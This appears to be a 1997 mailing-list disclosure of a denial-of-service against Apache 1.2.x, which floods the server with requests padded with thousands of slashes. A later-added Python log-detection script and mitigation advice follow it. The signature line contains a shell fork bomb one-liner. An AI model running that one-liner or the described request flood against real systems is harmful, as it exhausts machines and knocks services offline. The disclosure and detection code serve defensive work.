Apache DoS attack?

Michał Zalewski (lcamtuf@POLBOX.COM)
Tue, 30 Dec 1997 11:07:04 +0100


[excuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on 1.2.4).
When launched, it causes the victim's load average to increase and extreme
slowdowns of disk operations. On my i586 Linux an annoying slowdown was
experienced immediately (after maybe 5 seconds). After about 4 minutes
work had turned into real hell (286?).

The attached program ('beck') is a shell script. It works by sending
excessive HTTP requests with thousands of '/'s inside (parsed from the file
'beck.dat'). A single request only makes Apache think a little longer.
But when requests are sent from a loop - huh, the victim
system becomes slower and slower... At least on my machine; maybe when
Apache is running on a lightspeed workstation this script makes no
difference.

PS. A fast connection should help... It all depends on the victim's system
performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=

[attachment: beck.zip (base64 content not included)]
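The request pattern the post describes (paths stuffed with thousands of '/' characters, sent in a loop) is easy to spot in the server's own access log. The following is an added detection example, not part of the original message or of the 'beck' script: it parses Apache common-log lines, flags request URIs that are abnormally long or slash-heavy, and counts such requests per client host. The log lines are constructed samples, and the thresholds (64 slashes, 2048 bytes) are assumptions to be tuned against a site's real URL space.

```python
"""Flag Apache access-log entries whose request path carries an abnormal
number of '/' characters.

Added detection example; the sample log lines are constructed, not taken
from the original post, and the thresholds are assumptions.
"""
import re
from collections import Counter

# Apache "common" log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Return the fields of one common-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_abnormal_uri(uri, max_slashes=64, max_length=2048):
    """True when the request path is slash-heavy or long enough to be suspicious.

    Both thresholds are assumptions; legitimate sites rarely exceed a few
    dozen path separators, so a count in the hundreds or thousands stands out.
    """
    return uri.count('/') > max_slashes or len(uri) > max_length


def flag_clients(lines, max_slashes=64, max_length=2048):
    """Count abnormal requests per client host over the given log lines."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # truncated or foreign-format line: skip, do not crash
        if is_abnormal_uri(rec['uri'], max_slashes, max_length):
            hits[rec['host']] += 1
    return dict(hits)


def make_sample_log():
    """Constructed sample: two normal requests, then a burst of slash-stuffed ones."""
    normal = [
        '192.0.2.10 - - [30/Dec/1997:11:07:04 +0100] "GET /index.html HTTP/1.0" 200 2326',
        '192.0.2.10 - - [30/Dec/1997:11:07:05 +0100] "GET /images/logo.gif HTTP/1.0" 200 1024',
    ]
    stuffed = '/' * 3000 + 'index.html'  # the pattern described in the post
    burst = [
        f'198.51.100.7 - - [30/Dec/1997:11:07:0{i} +0100] "GET {stuffed} HTTP/1.0" 200 2326'
        for i in range(5, 9)
    ]
    return normal + burst


if __name__ == '__main__':
    for host, n in sorted(flag_clients(make_sample_log()).items()):
        print(f'{host}: {n} slash-stuffed request(s)')
```

Run against a real log with `flag_clients(open('access_log'))`; a host that trips the threshold repeatedly within a short window is the loop the post describes and is a candidate for rate limiting at the firewall. On later Apache releases the `LimitRequestLine` directive caps the request-line length before the path is ever processed, which removes the slow path entirely rather than merely detecting it.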